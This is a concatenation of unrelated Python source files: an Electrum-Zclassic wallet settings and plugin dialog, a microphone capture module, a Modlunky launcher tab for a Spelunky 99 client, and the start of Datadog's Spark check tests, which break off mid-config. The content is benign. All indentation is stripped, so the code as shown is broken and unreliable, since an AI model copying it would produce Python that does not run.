self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_list.refresh_headers()
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum-Zclassic to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum-Zclassic Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def save_transaction_into_wallet(self, tx):
try:
if not self.wallet.add_transaction(tx.txid(), tx):
self.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
self.show_error(e)
return False
else:
self.wallet.save_transactions(write=True)
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
self.msg_box(QPixmap(":icons/offline_tx.png"), None, _('Success'), _("Transaction added to wallet history"))
return True
|
mic.py
|
import abc
import numpy as np
import struct
import audioop
import threading
from . import configuration
try:
# noinspection PyPep8Naming
import Queue as queue
except ImportError:
# noinspection PyUnresolvedReferences
import queue
if configuration.is_raspberry():
import alsaaudio
else:
import pyaudio
CHANNELS = 1
RATE = 16000
MAX_INT16 = np.iinfo(np.int16).max
CHUNK_SIZE = 1000
def create_mic(config):
if configuration.is_raspberry():
return MicAlsa(config.device_sampling_rate, config.device_name)
else:
return MicPortAudio(config.device_sampling_rate)
class Mic(metaclass=abc.ABCMeta):
def __init__(self, device_sampling_rate):
self.state = None
self.device_sampling_rate = device_sampling_rate
self.end = False
self.queue = queue.Queue()
self.state = None
@abc.abstractmethod
def get_mic_data_async(self):
pass
@abc.abstractmethod
def get_mic_data(self):
pass
def to_float(self, data):
chunk, self.state = audioop.ratecv(data, 2, 1, self.device_sampling_rate, RATE, self.state)
data_int = struct.unpack('<' + 'h' * (len(chunk) // 2), chunk)
data_float = np.true_divide(data_int, MAX_INT16)
return data_float
def get_stream(p, callback):
return p.open(format=pyaudio.paInt16,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK_SIZE,
stream_callback=callback)
class MicPortAudio(Mic):
def __init__(self, device_sampling_rate):
Mic.__init__(self, device_sampling_rate)
# noinspection PyUnusedLocal
def callback(self, in_data, frame_count, time_info, status):
data_float = self.to_float(in_data)
self.queue.put(data_float)
return in_data, pyaudio.paAbort if self.end else pyaudio.paContinue
def get_mic_data_async(self):
p = pyaudio.PyAudio()
stream = get_stream(p, self.callback)
stream.start_stream()
while not self.end:
yield self.queue.get()
stream.stop_stream()
stream.close()
p.terminate()
self.queue.join()
def get_mic_data(self):
p = pyaudio.PyAudio()
stream = get_stream(p, None)
while not self.end:
chunk = stream.read(CHUNK_SIZE)
yield self.to_float(chunk)
stream.close()
p.terminate()
class MicAlsa(Mic):
def __init__(self, device_sampling_rate, device_name):
Mic.__init__(self, device_sampling_rate)
self.device_name = device_name
def get_mic_data_async(self):
inp = self.get_input_stream(self.device_name)
producer = threading.Thread(target=lambda: self.worker(inp))
producer.daemon = True
producer.start()
while not self.end:
yield self.queue.get()
inp.close()
self.queue.join()
def get_mic_data(self):
inp = self.get_input_stream(self.device_name)
while not self.end:
l, data = inp.read()
if l > 0:
data_float = self.to_float(data)
yield data_float
else:
if l < 0:
# print("Buffer overflow")
pass
inp.close()
def get_input_stream(self, device):
stream = alsaaudio.PCM(alsaaudio.PCM_CAPTURE, alsaaudio.PCM_NORMAL, device)
stream.setchannels(1)
stream.setrate(RATE)
stream.setformat(alsaaudio.PCM_FORMAT_S16_LE)
stream.setperiodsize(CHUNK_SIZE * self.device_sampling_rate // RATE)
return stream
def worker(self, inp):
while not self.end:
l, data = inp.read()
if l > 0:
data_float = self.to_float(data)
self.queue.put(data_float)
class MicFromFile(Mic):
def get_mic_data_async(self):
pass
def get_mic_data(self):
pass
|
s99.py
|
import logging
import subprocess
import time
import threading
import os
import tkinter as tk
from tkinter import ttk, PhotoImage
from PIL import Image, ImageTk
from modlunky2.constants import BASE_DIR, IS_EXE
from modlunky2.ui.widgets import PopupWindow, Tab
from modlunky2.utils import is_windows, tb_info
logger = logging.getLogger("modlunky2")
ICON_PATH = BASE_DIR / "static/images"
def tail_file(file_handle, log_func):
for line in file_handle:
log_func(line.strip())
def s99_client_path():
if IS_EXE:
client_dir = BASE_DIR
else:
client_dir = BASE_DIR / "../../dist"
if is_windows():
return client_dir / "s99-client.exe"
return client_dir / "s99-client"
class S99Client(threading.Thread):
def __init__(
self,
exe_path,
api_token,
):
super().__init__()
self.select_timeout = 0.1
self.shut_down = False
self.exe_path = exe_path
self.api_token = api_token
def run(self):
try:
self._run()
except Exception: # pylint: disable=broad-except
logger.critical("Failed in client thread: %s", tb_info())
def _run(self):
if not self.api_token:
logger.warning("No API Token...")
return
if not self.exe_path.exists():
logger.warning("No exe found...")
return
env = os.environ.copy()
env["SFYI_API_TOKEN"] = self.api_token
logger.info("Launching S99 Client")
cmd = [f"{self.exe_path}"]
client_proc = subprocess.Popen(
cmd,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
env=env,
)
shutting_down = False
stdout_logger = threading.Thread(
target=tail_file, args=(client_proc.stdout, logger.info)
)
stdout_logger.start()
stderr_logger = threading.Thread(
target=tail_file, args=(client_proc.stderr, logger.warning)
)
stderr_logger.start()
while True:
if not shutting_down and self.shut_down:
shutting_down = True
client_proc.kill()
break
if client_proc.poll():
break
time.sleep(0.1)
stdout_logger.join()
stderr_logger.join()
logger.info("Client closed.")
class Help(PopupWindow):
def __init__(self, modlunky_config, *args, **kwargs):
super().__init__("Spelunky 99 Help", modlunky_config, *args, **kwargs)
self.columnconfigure(0, weight=1)
ttk.Label(
self,
text=("Beta User Instructions:"),
font=("Arial", 10, "bold"),
).grid(row=0, column=0, sticky="nwe", padx=5)
ttk.Label(
self,
text=(
"* Click Connect and verify that the log shows you're receiving messages.\n"
"* Download the mod pack per provided instructions.\n"
"* Select the Spelunky 99 Mod on the Playlunky tab and hit Play!\n\n"
"Note: Make sure you have an API token configured in the Settings tab."
),
).grid(row=1, column=0, sticky="nwe", padx=5)
ttk.Separator(self).grid(row=2, column=0, pady=5, sticky="nsew")
ttk.Label(
self,
text=("Credits:"),
font=("Arial", 10, "bold"),
).grid(row=3, column=0, sticky="nwe", padx=5)
ttk.Label(
self,
text=(
"* jeremyhay - Creator of Spelunky 99\n"
"* Xanagear - Design / Promotion\n"
"* garebear - Modlunky / spelunky.fyi Integration\n"
"* JackHasWifi / Spudley - Spelunky 99 Logo\n"
"* The Greeni Porcini - Splash Screen Art\n"
),
).grid(row=4, column=0, sticky="nwe", padx=5)
ttk.Separator(self).grid(row=5, column=0, pady=5, sticky="nsew")
buttons = ttk.Frame(self)
buttons.grid(row=6, column=0, sticky="nsew")
buttons.columnconfigure(0, weight=1)
ok_button = ttk.Button(buttons, text="Ok", command=self.destroy)
ok_button.grid(row=0, column=0, pady=5, sticky="nsew")
class S99Tab(Tab):
def __init__(self, tab_control, modlunky_config, *args, **kwargs):
super().__init__(tab_control, *args, **kwargs)
self.tab_control = tab_control
self.modlunky_config = modlunky_config
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.s99_frame = ttk.LabelFrame(self, text="Spelunky 99")
self.s99_frame.grid(sticky="nsew")
self.s99_frame.rowconfigure(0, minsize=20)
self.s99_frame.rowconfigure(1, weight=0)
self.s99_frame.rowconfigure(2, weight=1)
self.s99_frame.rowconfigure(3, weight=0)
self.s99_frame.rowconfigure(4, minsize=60)
self.s99_frame.columnconfigure(0, weight=1)
self.help_icon = ImageTk.PhotoImage(
Image.open(ICON_PATH / "help.png").resize((24, 24), Image.ANTIALIAS)
)
self.header_frame = ttk.Frame(self.s99_frame)
self.header_frame.grid(row=0, column=0, sticky="nswe")
self.header_frame.rowconfigure(0, weight=1)
self.header_frame.columnconfigure(0, weight=1)
ttk.Label(
self.header_frame,
text=(
"Spelunky 99 is currently in closed beta but will be available soon."
),
anchor="center",
justify="center",
font=("Arial", 12, "bold"),
).grid(row=0, column=0, sticky="nwe", pady=(5, 5), padx=(10, 10))
ttk.Button(
self.header_frame,
padding=1,
image=self.help_icon,
command=self.show_help,
).grid(row=0, column=1, padx=5, pady=5, sticky="e")
ttk.Separator(self.s99_frame).grid(row=1, column=0, sticky="ew")
self.background_img = PhotoImage(
file=BASE_DIR / "static/images/montyfication.png"
)
self.s99_logo = PhotoImage(file=BASE_DIR / "static/images/99logo.png")
self.style = ttk.Style()
background = self.style.lookup("TFrame", "background")
self.canvas = tk.Canvas(self.s99_frame, bg=background)
self.canvas.grid(row=2, column=0, columnspan=2, pady=5, padx=5, sticky="snew")
self.canvas.create_image(0, 0, anchor="nw", image=self.background_img)
self.canvas.create_image(1920, 0, anchor="nw", image=self.background_img)
self.canvas.create_image(1920 * 2, 0, anchor="nw", image=self.background_img)
self.canvas.create_image(15, 15, anchor="nw", image=self.s99_logo)
ttk.Separator(self.s99_frame).grid(row=3, column=0, sticky="ew")
self.button_frame = ttk.Frame(self.s99_frame)
self.button_frame.grid(row=4, column=0, sticky="nswe")
self.button_frame.rowconfigure(0, weight=1)
self.button_frame.columnconfigure(0, weight=1)
self.button_frame.columnconfigure(1, weight=1)
self.button_connect = ttk.Button(
self.button_frame,
text="Connect",
command=self.connect,
state=tk.DISABLED,
style="Thicc.TButton",
)
self.button_connect.grid(row=0, column=0, pady=5, padx=5, sticky="nswe")
self.button_disconnect = ttk.Button(
self.button_frame,
text="Disconnect",
command=self.disconnect,
state=tk.DISABLED,
style="Thicc.TButton",
)
self.button_disconnect.grid(row=0, column=1, pady=5, padx=5, sticky="nswe")
self.client_thread = None
self.after(1000, self.after_client_thread)
self.render_buttons()
def on_load(self):
self.render_buttons()
@property
def client_path(self):
return s99_client_path()
def show_help(self):
Help(self.modlunky_config)
def render_buttons(self):
api_token = self.modlunky_config.config_file.spelunky_fyi_api_token
if not api_token:
self.disable_connect_button()
self.disable_disconnect_button()
return
if self.client_thread is None:
self.enable_connect_button()
self.disable_disconnect_button()
else:
self.enable_connect_button()
self.disable_disconnect_button()
def after_client_thread(self):
try:
if self.client_thread is None:
return
if self.client_thread.is_alive():
return
# Process was running but has since exited.
self.client_thread = None
self.render_buttons()
finally:
self.after(1000, self.after_client_thread)
def enable_connect_button(self):
self.button_connect["state"] = tk.NORMAL
def disable_connect_button(self):
self.button_connect["state"] = tk.DISABLED
def enable_disconnect_button(self):
self.button_disconnect["state"] = tk.NORMAL
def disable_disconnect_button(self):
self.button_disconnect["state"] = tk.DISABLED
def disconnect(self):
if self.client_thread:
self.client_thread.shut_down = True
self.render_buttons()
def connect(self):
self.disable_connect_button()
self.enable_disconnect_button()
api_token = self.modlunky_config.config_file.spelunky_fyi_api_token
self.client_thread = S99Client(self.client_path, api_token)
self.client_thread.start()
def client_closed(self):
self.enable_connect_button()
self.disable_disconnect_button()
def destroy(self) -> None:
self.disconnect()
return super().destroy()
|
test_spark.py
|
# (C) Datadog, Inc. 2010-2017
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
import os
from urlparse import urlparse, parse_qsl
from urllib import unquote_plus
from urlparse import urljoin
import json
import BaseHTTPServer
import threading
import ssl
import time
import requests
import mock
import pytest
from datadog_checks.stubs import aggregator as _aggregator
from datadog_checks.spark import SparkCheck
# IDs
YARN_APP_ID = 'application_1459362484344_0011'
SPARK_APP_ID = 'app_001'
CLUSTER_NAME = 'SparkCluster'
APP_NAME = 'PySparkShell'
# URLs for cluster managers
SPARK_APP_URL = 'http://localhost:4040'
SPARK_YARN_URL = 'http://localhost:8088'
SPARK_MESOS_URL = 'http://localhost:5050'
STANDALONE_URL = 'http://localhost:8080'
# SSL test server
SSL_SERVER_PORT = 44443
SSL_SERVER_ADDRESS = 'localhost'
SSL_SERVER_URL = 'https://{}:{}'.format(SSL_SERVER_ADDRESS, SSL_SERVER_PORT)
# URL Paths
SPARK_REST_PATH = 'api/v1/applications'
YARN_APPS_PATH = 'ws/v1/cluster/apps'
MESOS_APPS_PATH = 'frameworks'
STANDALONE_APPS_PATH = 'json/'
STANDALONE_APP_PATH_HTML = 'app/'
# Service Check Names
SPARK_SERVICE_CHECK = 'spark.application_master.can_connect'
YARN_SERVICE_CHECK = 'spark.resource_manager.can_connect'
MESOS_SERVICE_CHECK = 'spark.mesos_master.can_connect'
STANDALONE_SERVICE_CHECK = 'spark.standalone_master.can_connect'
TEST_USERNAME = 'admin'
TEST_PASSWORD = 'password'
CUSTOM_TAGS = ['optional:tag1']
def join_url_dir(url, *args):
'''
Join a URL with multiple directories
'''
for path in args:
url = url.rstrip('/') + '/'
url = urljoin(url, path.lstrip('/'))
return url
class Url(object):
'''A url object that can be compared with other url orbjects
without regard to the vagaries of encoding, escaping, and ordering
of parameters in query strings.'''
def __init__(self, url):
parts = urlparse(url)
_query = frozenset(parse_qsl(parts.query))
_path = unquote_plus(parts.path)
parts = parts._replace(query=_query, path=_path)
self.parts = parts
def __eq__(self, other):
return self.parts == other.parts
def __hash__(self):
return hash(self.parts)
# YARN Service URLs
YARN_APP_URL = Url(urljoin(SPARK_YARN_URL, YARN_APPS_PATH) + '?states=RUNNING&applicationTypes=SPARK')
YARN_SPARK_APP_URL = Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH))
YARN_SPARK_JOB_URL = Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'jobs'))
YARN_SPARK_STAGE_URL = \
Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'stages'))
YARN_SPARK_EXECUTOR_URL = \
Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'executors'))
YARN_SPARK_RDD_URL = \
Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'storage/rdd'))
YARN_SPARK_STREAMING_STATISTICS_URL = \
Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'streaming/statistics'))
# Mesos Service URLs
MESOS_APP_URL = Url(urljoin(SPARK_MESOS_URL, MESOS_APPS_PATH))
MESOS_SPARK_APP_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH))
MESOS_SPARK_JOB_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'jobs'))
MESOS_SPARK_STAGE_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'stages'))
MESOS_SPARK_EXECUTOR_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'executors'))
MESOS_SPARK_RDD_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'storage/rdd'))
MESOS_SPARK_STREAMING_STATISTICS_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID,
'streaming/statistics'))
# Spark Standalone Service URLs
STANDALONE_APP_URL = Url(urljoin(STANDALONE_URL, STANDALONE_APPS_PATH))
STANDALONE_APP_HTML_URL = Url(urljoin(STANDALONE_URL, STANDALONE_APP_PATH_HTML) + '?appId=' + SPARK_APP_ID)
STANDALONE_SPARK_APP_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH))
STANDALONE_SPARK_JOB_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'jobs'))
STANDALONE_SPARK_STAGE_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'stages'))
STANDALONE_SPARK_EXECUTOR_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'executors'))
STANDALONE_SPARK_RDD_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'storage/rdd'))
STANDALONE_SPARK_STREAMING_STATISTICS_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID,
'streaming/statistics'))
STANDALONE_SPARK_JOB_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'jobs'))
STANDALONE_SPARK_STAGE_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'stages'))
STANDALONE_SPARK_EXECUTOR_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'executors'))
STANDALONE_SPARK_RDD_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'storage/rdd'))
STANDALONE_SPARK_STREAMING_STATISTICS_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME,
'streaming/statistics'))
FIXTURE_DIR = os.path.join(os.path.dirname(__file__), 'fixtures')
CERTIFICATE_DIR = os.path.join(os.path.dirname(__file__), 'certificate')
@pytest.fixture
def aggregator():
_aggregator.reset()
return _aggregator
def yarn_requests_get_mock(*args, **kwargs):
class MockResponse:
def __init__(self, json_data, status_code):
self.json_data = json_data
self.status_code = status_code
def json(self):
return json.loads(self.json_data)
def raise_for_status(self):
return True
arg_url = Url(args[0])
if arg_url == YARN_APP_URL:
with open(os.path.join(FIXTURE_DIR, 'yarn_apps'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
elif arg_url == YARN_SPARK_APP_URL:
with open(os.path.join(FIXTURE_DIR, 'spark_apps'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
elif arg_url == YARN_SPARK_JOB_URL:
with open(os.path.join(FIXTURE_DIR, 'job_metrics'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
elif arg_url == YARN_SPARK_STAGE_URL:
with open(os.path.join(FIXTURE_DIR, 'stage_metrics'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
elif arg_url == YARN_SPARK_EXECUTOR_URL:
with open(os.path.join(FIXTURE_DIR, 'executor_metrics'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
elif arg_url == YARN_SPARK_RDD_URL:
with open(os.path.join(FIXTURE_DIR, 'rdd_metrics'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
elif arg_url == YARN_SPARK_STREAMING_STATISTICS_URL:
with open(os.path.join(FIXTURE_DIR, 'streaming_statistics'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
def yarn_requests_auth_mock(*args, **kwargs):
# Make sure we're passing in authentication
assert 'auth' in kwargs, "Error, missing authentication"
# Make sure we've got the correct username and password
assert kwargs['auth'] == (TEST_USERNAME, TEST_PASSWORD), "Incorrect username or password"
# Return mocked request.get(...)
return yarn_requests_get_mock(*args, **kwargs)
def mesos_requests_get_mock(*args, **kwargs):
class MockMesosResponse:
def __init__(self, json_data, status_code):
self.json_data = json_data
self.status_code = status_code
def json(self):
return json.loads(self.json_data)
def raise_for_status(self):
return True
arg_url = Url(args[0])
if arg_url == MESOS_APP_URL:
with open(os.path.join(FIXTURE_DIR, 'mesos_apps'), 'r') as f:
body = f.read()
return MockMesosResponse(body, 200)
elif arg_url == MESOS_SPARK_APP_URL:
with open(os.path.join(FIXTURE_DIR, 'spark_apps'), 'r') as f:
body = f.read()
return MockMesosResponse(body, 200)
elif arg_url == MESOS_SPARK_JOB_URL:
with open(os.path.join(FIXTURE_DIR, 'job_metrics'), 'r') as f:
body = f.read()
return MockMesosResponse(body, 200)
elif arg_url == MESOS_SPARK_STAGE_URL:
with open(os.path.join(FIXTURE_DIR, 'stage_metrics'), 'r') as f:
body = f.read()
return MockMesosResponse(body, 200)
elif arg_url == MESOS_SPARK_EXECUTOR_URL:
with open(os.path.join(FIXTURE_DIR, 'executor_metrics'), 'r') as f:
body = f.read()
return MockMesosResponse(body, 200)
elif arg_url == MESOS_SPARK_RDD_URL:
with open(os.path.join(FIXTURE_DIR, 'rdd_metrics'), 'r') as f:
body = f.read()
return MockMesosResponse(body, 200)
elif arg_url == MESOS_SPARK_STREAMING_STATISTICS_URL:
with open(os.path.join(FIXTURE_DIR, 'streaming_statistics'), 'r') as f:
body = f.read()
return MockMesosResponse(body, 200)
def standalone_requests_get_mock(*args, **kwargs):
class MockStandaloneResponse:
text = ''
def __init__(self, json_data, status_code):
self.json_data = json_data
self.status_code = status_code
self.text = json_data
def json(self):
return json.loads(self.json_data)
def raise_for_status(self):
return True
arg_url = Url(args[0])
if arg_url == STANDALONE_APP_URL:
with open(os.path.join(FIXTURE_DIR, 'spark_standalone_apps'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_APP_HTML_URL:
with open(os.path.join(FIXTURE_DIR, 'spark_standalone_app'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_APP_URL:
with open(os.path.join(FIXTURE_DIR, 'spark_apps'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_JOB_URL:
with open(os.path.join(FIXTURE_DIR, 'job_metrics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_STAGE_URL:
with open(os.path.join(FIXTURE_DIR, 'stage_metrics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_EXECUTOR_URL:
with open(os.path.join(FIXTURE_DIR, 'executor_metrics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_RDD_URL:
with open(os.path.join(FIXTURE_DIR, 'rdd_metrics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_STREAMING_STATISTICS_URL:
with open(os.path.join(FIXTURE_DIR, 'streaming_statistics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
def standalone_requests_pre20_get_mock(*args, **kwargs):
class MockStandaloneResponse:
text = ''
def __init__(self, json_data, status_code):
self.json_data = json_data
self.status_code = status_code
self.text = json_data
def json(self):
return json.loads(self.json_data)
def raise_for_status(self):
return True
arg_url = Url(args[0])
if arg_url == STANDALONE_APP_URL:
with open(os.path.join(FIXTURE_DIR, 'spark_standalone_apps'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_APP_HTML_URL:
with open(os.path.join(FIXTURE_DIR, 'spark_standalone_app'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_APP_URL:
with open(os.path.join(FIXTURE_DIR, 'spark_apps_pre20'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_JOB_URL:
return MockStandaloneResponse("{}", 404)
elif arg_url == STANDALONE_SPARK_STAGE_URL:
return MockStandaloneResponse("{}", 404)
elif arg_url == STANDALONE_SPARK_EXECUTOR_URL:
return MockStandaloneResponse("{}", 404)
elif arg_url == STANDALONE_SPARK_RDD_URL:
return MockStandaloneResponse("{}", 404)
elif arg_url == STANDALONE_SPARK_STREAMING_STATISTICS_URL:
return MockStandaloneResponse("{}", 404)
elif arg_url == STANDALONE_SPARK_JOB_URL_PRE20:
with open(os.path.join(FIXTURE_DIR, 'job_metrics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_STAGE_URL_PRE20:
with open(os.path.join(FIXTURE_DIR, 'stage_metrics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_EXECUTOR_URL_PRE20:
with open(os.path.join(FIXTURE_DIR, 'executor_metrics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_RDD_URL_PRE20:
with open(os.path.join(FIXTURE_DIR, 'rdd_metrics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_STREAMING_STATISTICS_URL_PRE20:
with open(os.path.join(FIXTURE_DIR, 'streaming_statistics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
CHECK_NAME = 'spark'
YARN_CONFIG = {
'spark_url': 'http://localhost:8088',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_yarn_mode',
'tags': list(CUSTOM_TAGS),
}
YARN_AUTH_CONFIG = {
'spark_url': 'http://localhost:8088',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_yarn_mode',
'tags': list(CUSTOM_TAGS),
'username': TEST_USERNAME,
'password': TEST_PASSWORD,
}
MESOS_CONFIG = {
'spark_url': 'http://localhost:5050',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_mesos_mode',
'tags': list(CUSTOM_TAGS),
}
MESOS_FILTERED_CONFIG = {
'spark_url': 'http://localhost:5050',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_mesos_mode',
'spark_ui_ports': [1234]
}
STANDALONE_CONFIG = {
'spark_url': 'http://localhost:8080',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode'
}
STANDALONE_CONFIG_PRE_20 = {
'spark_url': 'http://localhost:8080',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode',
'spark_pre_20_mode': 'true'
}
SSL_CONFIG = {
